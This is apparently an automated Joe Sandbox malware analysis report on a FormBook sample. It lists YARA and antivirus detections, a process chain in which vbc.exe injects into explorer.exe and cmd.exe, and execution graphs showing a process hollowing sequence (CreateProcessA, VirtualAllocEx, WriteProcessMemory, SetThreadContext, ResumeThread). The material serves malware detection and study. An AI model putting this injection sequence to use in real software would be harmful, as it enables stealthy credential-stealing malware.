                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.485792743.0000000002639000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 44%, ReversingLabs
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: vbc.exe PID: 2712 Parent PID: 2540

                                                  General

                                                  Start time:20:21:52
                                                  Start date:13/01/2022
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\Public\vbc.exe
                                                  Imagebase:0x11a0000
                                                  File size:417792 bytes
                                                  MD5 hash:83AC585E99B527EEB278702F8F711568
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: explorer.exe PID: 1764 Parent PID: 2712

                                                  General

                                                  Start time:20:21:55
                                                  Start date:13/01/2022
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0xffa10000
                                                  File size:3229696 bytes
                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: cmd.exe PID: 2568 Parent PID: 1764

                                                  General

                                                  Start time:20:22:08
                                                  Start date:13/01/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                  Imagebase:0x49d90000
                                                  File size:302592 bytes
                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Chronological Activities

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >

                                                    Analysis Process: vbc.exe PID: 2540 Parent PID: 2016 vbc.exeCOMMON

                                                    Execution Graph

                                                    Execution Coverage:22.4%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:1.7%
                                                    Total number of Nodes:175
                                                    Total number of Limit Nodes:14

                                                    Graph

                                                    execution_graph 9275 900bc0 9277 900be2 9275->9277 9276 9010da 9277->9276 9279 9016a0 9277->9279 9280 9016cd 9279->9280 9284 901ab0 9280->9284 9300 901ac0 9280->9300 9281 90170d 9281->9277 9285 901ada 9284->9285 9316 901b10 9285->9316 9325 901f6c 9285->9325 9334 9022cc 9285->9334 9343 901f89 9285->9343 9352 901ec7 9285->9352 9361 901f26 9285->9361 9370 902625 9285->9370 9379 902022 9285->9379 9388 9020e2 9285->9388 9399 9027d9 9285->9399 9408 901e13 9285->9408 9420 902272 9285->9420 9431 902031 9285->9431 9286 901b08 9286->9281 9301 901ada 9300->9301 9303 901b10 5 API calls 9301->9303 9304 902031 5 API calls 9301->9304 9305 902272 7 API calls 9301->9305 9306 901e13 7 API calls 9301->9306 9307 9027d9 5 API calls 9301->9307 9308 9020e2 5 API calls 9301->9308 9309 902022 5 API calls 9301->9309 9310 902625 5 API calls 9301->9310 9311 901f26 5 API calls 9301->9311 9312 901ec7 5 API calls 9301->9312 9313 901f89 5 API calls 9301->9313 9314 9022cc 5 API calls 9301->9314 9315 901f6c 5 API calls 9301->9315 9302 901b08 9302->9281 9303->9302 9304->9302 9305->9302 9306->9302 9307->9302 9308->9302 9309->9302 9310->9302 9311->9302 9312->9302 9313->9302 9314->9302 9315->9302 9317 901b53 9316->9317 9317->9286 9318 90288c 9317->9318 9440 900728 9317->9440 9444 900390 9317->9444 9448 900138 9317->9448 9452 900130 9317->9452 9456 902ad0 9317->9456 9460 902ac0 9317->9460 9318->9286 9327 901c0b 9325->9327 9326 90288c 9326->9286 9327->9286 9327->9326 9328 902ad0 ResumeThread 9327->9328 9329 902ac0 ResumeThread 9327->9329 9330 900390 WriteProcessMemory 9327->9330 9331 900130 Wow64SetThreadContext 9327->9331 9332 900138 Wow64SetThreadContext 9327->9332 9333 900728 CreateProcessA 9327->9333 9328->9327 9329->9327 9330->9327 9331->9327 9332->9327 9333->9327 9336 901c0b 9334->9336 9335 90288c 9335->9286 9336->9286 9336->9335 9337 900390 WriteProcessMemory 9336->9337 9338 902ad0 ResumeThread 9336->9338 9339 902ac0 ResumeThread 9336->9339 9340 900728 CreateProcessA 9336->9340 9341 900130 Wow64SetThreadContext 9336->9341 9342 900138 Wow64SetThreadContext 9336->9342 9337->9336 9338->9336 9339->9336 9340->9336 9341->9336 9342->9336 9345 901c0b 9343->9345 9344 90288c 9344->9286 9345->9286 9345->9344 9346 902ad0 ResumeThread 9345->9346 9347 902ac0 ResumeThread 9345->9347 9348 900728 CreateProcessA 9345->9348 9349 900130 Wow64SetThreadContext 9345->9349 9350 900138 Wow64SetThreadContext 9345->9350 9351 900390 WriteProcessMemory 9345->9351 9346->9345 9347->9345 9348->9345 9349->9345 9350->9345 9351->9345 9354 901c0b 9352->9354 9353 90288c 9353->9286 9354->9286 9354->9353 9355 902ad0 ResumeThread 9354->9355 9356 902ac0 ResumeThread 9354->9356 9357 900390 WriteProcessMemory 9354->9357 9358 900130 Wow64SetThreadContext 9354->9358 9359 900138 Wow64SetThreadContext 9354->9359 9360 900728 CreateProcessA 9354->9360 9355->9354 9356->9354 9357->9354 9358->9354 9359->9354 9360->9354 9363 901c0b 9361->9363 9362 90288c 9362->9286 9363->9286 9363->9362 9364 900728 CreateProcessA 9363->9364 9365 902ad0 ResumeThread 9363->9365 9366 902ac0 ResumeThread 9363->9366 9367 900130 Wow64SetThreadContext 9363->9367 9368 900138 Wow64SetThreadContext 9363->9368 9369 900390 WriteProcessMemory 9363->9369 9364->9363 9365->9363 9366->9363 9367->9363 9368->9363 9369->9363 9372 901c0b 9370->9372 9371 90288c 9371->9286 9372->9286 9372->9371 9373 900130 Wow64SetThreadContext 9372->9373 9374 900138 Wow64SetThreadContext 9372->9374 9375 900728 CreateProcessA 9372->9375 9376 902ad0 ResumeThread 9372->9376 9377 902ac0 ResumeThread 9372->9377 9378 900390 WriteProcessMemory 9372->9378 9373->9372 9374->9372 9375->9372 9376->9372 9377->9372 9378->9372 9381 901c0b 9379->9381 9380 90288c 9380->9286 9381->9286 9381->9380 9382 902ad0 ResumeThread 9381->9382 9383 902ac0 ResumeThread 9381->9383 9384 900390 WriteProcessMemory 9381->9384 9385 900130 Wow64SetThreadContext 9381->9385 9386 900138 Wow64SetThreadContext 9381->9386 9387 900728 CreateProcessA 9381->9387 9382->9381 9383->9381 9384->9381 9385->9381 9386->9381 9387->9381 9389 9020f8 9388->9389 9391 901c0b 9388->9391 9389->9391 9392 900390 WriteProcessMemory 9389->9392 9390 90288c 9390->9286 9391->9286 9391->9390 9393 900130 Wow64SetThreadContext 9391->9393 9394 900138 Wow64SetThreadContext 9391->9394 9395 900728 CreateProcessA 9391->9395 9396 902ad0 ResumeThread 9391->9396 9397 902ac0 ResumeThread 9391->9397 9398 900390 WriteProcessMemory 9391->9398 9392->9391 9393->9391 9394->9391 9395->9391 9396->9391 9397->9391 9398->9391 9400 901c0b 9399->9400 9400->9286 9400->9399 9401 90288c 9400->9401 9402 900130 Wow64SetThreadContext 9400->9402 9403 900138 Wow64SetThreadContext 9400->9403 9404 900728 CreateProcessA 9400->9404 9405 900390 WriteProcessMemory 9400->9405 9406 902ad0 ResumeThread 9400->9406 9407 902ac0 ResumeThread 9400->9407 9401->9286 9402->9400 9403->9400 9404->9400 9405->9400 9406->9400 9407->9400 9468 902a58 9408->9468 9410 90288c 9410->9286 9411 901c0b 9411->9286 9411->9410 9413 902ad0 ResumeThread 9411->9413 9414 902ac0 ResumeThread 9411->9414 9415 900390 WriteProcessMemory 9411->9415 9417 900130 Wow64SetThreadContext 9411->9417 9418 900138 Wow64SetThreadContext 9411->9418 9419 900728 CreateProcessA 9411->9419 9413->9411 9414->9411 9415->9411 9416 900390 WriteProcessMemory 9416->9411 9417->9411 9418->9411 9419->9411 9481 9004e8 9420->9481 9485 9004f0 9420->9485 9421 90288c 9421->9286 9422 901c0b 9422->9286 9422->9421 9425 900728 CreateProcessA 9422->9425 9426 902ad0 ResumeThread 9422->9426 9427 902ac0 ResumeThread 9422->9427 9428 900130 Wow64SetThreadContext 9422->9428 9429 900138 Wow64SetThreadContext 9422->9429 9430 900390 WriteProcessMemory 9422->9430 9425->9422 9426->9422 9427->9422 9428->9422 9429->9422 9430->9422 9433 901c0b 9431->9433 9432 90288c 9432->9286 9433->9286 9433->9432 9434 900728 CreateProcessA 9433->9434 9435 900130 Wow64SetThreadContext 9433->9435 9436 900138 Wow64SetThreadContext 9433->9436 9437 902ad0 ResumeThread 9433->9437 9438 902ac0 ResumeThread 9433->9438 9439 900390 WriteProcessMemory 9433->9439 9434->9433 9435->9433 9436->9433 9437->9433 9438->9433 9439->9433 9441 9007af CreateProcessA 9440->9441 9443 900a0d 9441->9443 9445 9003dc WriteProcessMemory 9444->9445 9447 90047b 9445->9447 9447->9317 9449 900181 Wow64SetThreadContext 9448->9449 9451 9001ff 9449->9451 9451->9317 9453 900181 Wow64SetThreadContext 9452->9453 9455 9001ff 9453->9455 9455->9317 9457 902aea 9456->9457 9464 900048 9457->9464 9461 902aea 9460->9461 9463 900048 ResumeThread 9461->9463 9462 902b19 9462->9317 9463->9462 9465 90008c ResumeThread 9464->9465 9467 9000de 9465->9467 9467->9317 9469 902a72 9468->9469 9473 900268 9469->9473 9477 900260 9469->9477 9470 901e2f 9470->9416 9474 9002ac VirtualAllocEx 9473->9474 9476 90032a 9474->9476 9476->9470 9478 9002ac VirtualAllocEx 9477->9478 9480 90032a 9478->9480 9480->9470 9482 90053c ReadProcessMemory 9481->9482 9484 9005ba 9482->9484 9484->9422 9486 90053c ReadProcessMemory 9485->9486 9488 9005ba 9486->9488 9488->9422

                                                    Executed Functions

                                                    Function 002E03E4, Relevance: 20.6, Strings: 15, Instructions: 1896COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 2e03e4-2e4871 call 2e0720 * 30 call 2e4e28 336 2e48bd-2e48cb 0->336 337 2e48cd-2e49e6 call 2e4ef0 call 2e0720 * 4 336->337 338 2e4873-2e4875 336->338 365 2e49ed-2e4e21 call 2e0720 * 6 337->365 339 2e48ad-2e48b7 338->339 340 2e48b9-2e48bc 339->340 341 2e4877-2e48a5 339->341 340->336 349 2e48ac 341->349 349->339
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $!$8$?$@$@$@$N$N$R$R$R$p$p$p
                                                    • API String ID: 0-2934226087
                                                    • Opcode ID: f1c14d85aa47bef00079ccc7a5e6508f3da07e26613ab32bb83bab4fecf585f7
                                                    • Instruction ID: 17c5b754d291c58b0595b7ee675105fd019fd6d3e0d85b81b8fd2819d39bac5f
                                                    • Opcode Fuzzy Hash: f1c14d85aa47bef00079ccc7a5e6508f3da07e26613ab32bb83bab4fecf585f7
                                                    • Instruction Fuzzy Hash: AA13E334A10619CFC765DF34C894B9AB7B2BF8A304F5045ADD44AAB360DB75AE85CF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E2CF8, Relevance: 20.6, Strings: 15, Instructions: 1871COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 418 2e2cf8-2e2d29 419 2e2d33-2e2d35 418->419 420 2e2d3c-2e2eaf 419->420 458 2e2eb9-2e2ebb 420->458 459 2e2ec2-2e3581 call 2e0720 * 3 458->459 568 2e3588-2e3599 call 2e0720 459->568 570 2e359e-2e4855 call 2e0720 * 26 568->570 750 2e485d-2e4863 call 2e4e28 570->750 751 2e4869-2e4871 750->751 752 2e48bd-2e48cb 751->752 753 2e48cd-2e48e5 752->753 754 2e4873-2e4875 752->754 759 2e48ec-2e48fe call 2e4ef0 753->759 755 2e48ad-2e48b7 754->755 756 2e48b9-2e48bc 755->756 757 2e4877-2e4895 755->757 756->752 762 2e489c-2e48a5 757->762 761 2e4904-2e493d call 2e0720 * 2 759->761 769 2e4944-2e4955 761->769 765 2e48ac 762->765 765->755 770 2e495c-2e49cc call 2e0720 * 2 769->770 780 2e49d6-2e49e6 770->780 781 2e49ed-2e4e21 call 2e0720 * 6 780->781
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $!$8$?$@$@$@$N$N$R$R$R$p$p$p
                                                    • API String ID: 0-2934226087
                                                    • Opcode ID: dfb658c104533135ba103f100d8f435f215b27b17657359a0c0e7b375cd29629
                                                    • Instruction ID: c5d44dd4cf90b054ea7851aa0b52705df42534a4dfcbf52eea88d45936a7e3f6
                                                    • Opcode Fuzzy Hash: dfb658c104533135ba103f100d8f435f215b27b17657359a0c0e7b375cd29629
                                                    • Instruction Fuzzy Hash: EE13D230A11619CFC765DF34C894B9AB7B2BF8A304F5045ADD44AAB360DB75AE85CF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00901B10, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 988 901b10-901b51 989 901b53 988->989 990 901b58-901b7d 988->990 989->990 991 901b98-901b9c 990->991 992 901b9e-901bc7 991->992 993 901b7f-901b91 991->993 997 902838-902853 992->997 998 901bcd-901be7 992->998 993->991 994 901b93 993->994 994->991 1000 901c0b-901c14 997->1000 1001 902859-90286a 997->1001 999 901be9-901c09 998->999 998->1000 999->1000 1002 901c70-901d42 call 900728 999->1002 1003 901c16-902822 1000->1003 1004 901c1d-901c45 1000->1004 1001->1000 1005 90286f-902876 1001->1005 1021 902253-90225c 1002->1021 1022 901d48-901d84 call 900390 1002->1022 1013 902825-902836 1003->1013 1004->1000 1011 901c47-901c48 1004->1011 1006 90287c-902887 1005->1006 1007 901c4d-901c6e 1005->1007 1006->1000 1007->1000 1007->1002 1011->1013 1013->1005 1023 902265-902270 1021->1023 1024 90225e 1021->1024 1038 901d86-901da6 1022->1038 1023->1021 1028 902339-90235c 1023->1028 1026 902362-902378 1024->1026 1027 902608-90260f 1024->1027 1024->1028 1029 9022fc-902323 1024->1029 1072 90237b call 900130 1026->1072 1073 90237b call 900138 1026->1073 1032 902615-902620 1027->1032 1033 90257b-9025c2 1027->1033 1028->1021 1028->1026 1035 902329-902334 1029->1035 1036 901f8e-901ffd 1029->1036 1032->1021 1033->1027 1035->1021 1036->1021 1065 902003-90200f 1036->1065 1037 90237d-90239d 1041 9023c5-902431 1037->1041 1042 90239f-9023ba 1037->1042 1043 901dac-901dc7 1038->1043 1044 901eed-901f1c 1038->1044 1069 902437 call 902ad0 1041->1069 1070 902437 call 902ac0 1041->1070 1042->1041 1043->1021 1045 901dcd-901e0e 1043->1045 1044->1021 1045->1021 1051 90243d-90245d 1053 902485-90249f 1051->1053 1054 90245f-90247a 1051->1054 1057 9024a5-9024d3 1053->1057 1058 9027dc-902820 1053->1058 1054->1053 1057->1021 1058->1013 1066 90288c-902893 1058->1066 1065->1021 1069->1051 1070->1051 1072->1037 1073->1037
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TDD
                                                    • API String ID: 0-1901089014
                                                    • Opcode ID: 4a636b07065e34e9c1e3423d9872ed5b03bc9323debe36a473a8ba8eef8d3670
                                                    • Instruction ID: 13e378249a00f884d7ed6f6b7bf9fcd7de7b7855a0d860d21b9e5ccaaabf04d1
                                                    • Opcode Fuzzy Hash: 4a636b07065e34e9c1e3423d9872ed5b03bc9323debe36a473a8ba8eef8d3670
                                                    • Instruction Fuzzy Hash: DDE1F074D042288FDB24DF65C888BEDBBB5AB89304F1085EAD449A7291EB749EC5CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E1BC2, Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 4b57d3f41b40746888d1406fe0f179896419d67bbe74ade847149d21a37edf3f
                                                    • Instruction ID: 2b335ad1d635232aa063f7ae19f2bef1edfaa8e9a656e3a4a1fd342846d1f5f9
                                                    • Opcode Fuzzy Hash: 4b57d3f41b40746888d1406fe0f179896419d67bbe74ade847149d21a37edf3f
                                                    • Instruction Fuzzy Hash: CB510F34B502458FCB14DB69D8809AEBBB2EF8921075881BAD609D7755DB30ED65CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E07C6, Relevance: .9, Instructions: 922COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7745029d541474d5c7ff427ab3f9d2323e833b151ef62c5c9603d19264311085
                                                    • Instruction ID: 359ef075097eef9a7311aef8b9fe8569cb4b42c970ccc03e64d45fc4b965c11e
                                                    • Opcode Fuzzy Hash: 7745029d541474d5c7ff427ab3f9d2323e833b151ef62c5c9603d19264311085
                                                    • Instruction Fuzzy Hash: CC82B035E102698FCB14CF69D880AADBBF2FF88304F55C569D016EB759DB34A981CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E0812, Relevance: .4, Instructions: 352COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e534931f05ba89f0bac61e4eea74b786a9711a2c0da15c3f1f183cd15270d2ac
                                                    • Instruction ID: d3c58ae1876f9ed55c94b8c9e79170c55636be751210491c7c523b6cbf494336
                                                    • Opcode Fuzzy Hash: e534931f05ba89f0bac61e4eea74b786a9711a2c0da15c3f1f183cd15270d2ac
                                                    • Instruction Fuzzy Hash: 96D19335E112298FDB14DF7AD880AAEB7F2BFC8304F55C529D405EB754DB30AA428B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E18B0, Relevance: .2, Instructions: 235COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1a393ac7ad13c7086b7bd23a35304daa8302539a79539d1051b8089dbf528c4e
                                                    • Instruction ID: 7267a6e9ccf210777546756600d3a049e92ce11748b65472455c231a95d837fd
                                                    • Opcode Fuzzy Hash: 1a393ac7ad13c7086b7bd23a35304daa8302539a79539d1051b8089dbf528c4e
                                                    • Instruction Fuzzy Hash: 7D817C32F201559FC714DB69D884A9EB7B3AFC8714F5A8174E409DB759EB30AC11CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E04A8, Relevance: .2, Instructions: 206COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f441ff7d45ac5552c03569b71867ff0bc1ccc5242e1a5a54dcce2f52d1834328
                                                    • Instruction ID: 7cd9eface51cf0e10765fc555381015bffe20a81d54d33408de32d0c59933c66
                                                    • Opcode Fuzzy Hash: f441ff7d45ac5552c03569b71867ff0bc1ccc5242e1a5a54dcce2f52d1834328
                                                    • Instruction Fuzzy Hash: A6711B78D5010ADFDF14CFAAD980AAEBBB1BF88310F10A659D402EB250DB71AA41CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 002E1951, Relevance: .2, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ecbc27213fed023d1737d48819c774d49fddb76c2e41f63763c823f6f1fca9df
                                                    • Instruction ID: 86184d235020d866cf89d878d9804af1e7024d69688b4455e60a39e2cc806301
                                                    • Opcode Fuzzy Hash: ecbc27213fed023d1737d48819c774d49fddb76c2e41f63763c823f6f1fca9df
                                                    • Instruction Fuzzy Hash: 01615D32F201259FD714DB69C894B9EB3B3AFC8714F5A8574E4099B759EA31AC01CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00900728, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 834 900728-9007c1 836 9007c3-9007da 834->836 837 90080a-900832 834->837 836->837 842 9007dc-9007e1 836->842 840 900834-900848 837->840 841 900878-9008ce 837->841 840->841 849 90084a-90084f 840->849 851 9008d0-9008e4 841->851 852 900914-900a0b CreateProcessA 841->852 843 9007e3-9007ed 842->843 844 900804-900807 842->844 846 9007f1-900800 843->846 847 9007ef 843->847 844->837 846->846 850 900802 846->850 847->846 853 900851-90085b 849->853 854 900872-900875 849->854 850->844 851->852 859 9008e6-9008eb 851->859 870 900a14-900af9 852->870 871 900a0d-900a13 852->871 856 90085d 853->856 857 90085f-90086e 853->857 854->841 856->857 857->857 860 900870 857->860 861 9008ed-9008f7 859->861 862 90090e-900911 859->862 860->854 864 9008f9 861->864 865 9008fb-90090a 861->865 862->852 864->865 865->865 866 90090c 865->866 866->862 883 900b09-900b0d 870->883 884 900afb-900aff 870->884 871->870 886 900b1d-900b21 883->886 887 900b0f-900b13 883->887 884->883 885 900b01 884->885 885->883 888 900b31-900b35 886->888 889 900b23-900b27 886->889 887->886 890 900b15 887->890 892 900b37-900b60 888->892 893 900b6b-900b76 888->893 889->888 891 900b29 889->891 890->886 891->888 892->893
